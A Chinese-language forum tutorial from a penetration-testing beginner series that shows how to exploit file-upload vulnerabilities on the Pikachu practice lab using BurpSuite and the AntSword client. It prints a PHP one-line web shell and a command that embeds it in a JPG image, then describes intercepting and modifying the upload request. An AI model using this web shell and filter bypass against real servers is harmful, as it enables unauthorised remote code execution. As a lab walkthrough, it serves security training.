【Kali工具入门集】文件上传漏洞基础

隐士 6月前 135

http://bbs.tiger2019.cn/upload/attach/202003/40_VTFTDTS2VBB43SE.png

  BurpSuite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

  今天就来介绍通过Burp来利用文件上传漏洞


本文将介绍两种常见的文件上传漏洞

提前准备:Pikachu靶机,BurpSuite,FireFox

Burp代理配置请见本系列之前的文章

第一种

1.进入Pikachu靶场文件上传的第一个关卡


2.查看信息,应该是只能够上传图片文件


3.这种类型,我们需要制作一个图片马(将图片和一句话木马进行捆绑)

(1)命令提示符进入桌面,将一句话木马(tiger.php)和图片(0.Jpg)进行捆绑,捆绑后的文件名为2.Jpg
一句话木马内容:

<?php @eval($_POST['password']) ?>


(2)运行命令

copy /b 0.jpg+tiger.php 2.jpg


4.打开Burp,配置代理



5.选中图片文件


6.开始抓包

(为了方便查看,本文使用了中文版的Burp)


7.改包,放包

8.取消拦截代理


9.查看上传的路径,并使用中国蚁剑进行连接

http://地址/vul/unsafeupload/uploads/2.php


10.连接


第二种

1.进入页面


2.选中tiger.php文件,打开Burp代理拦截


3.改包,放包


4.上传成功,使用蚁剑连接

http://地址/vul/unsafeupload/uploads/tiger.php


帖子版权声明 1、本帖标题:【Kali工具入门集】文件上传漏洞基础
    本站网址:http://bbs.tiger2019.cn/
2、本网站的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
3、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
4、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
5、站长邮箱:Administrator@tiger2019.cn 除非注明,本帖由隐士在本站《渗透测试》版块原创发布, 转载请注明出处!
最新回复 (0)
返回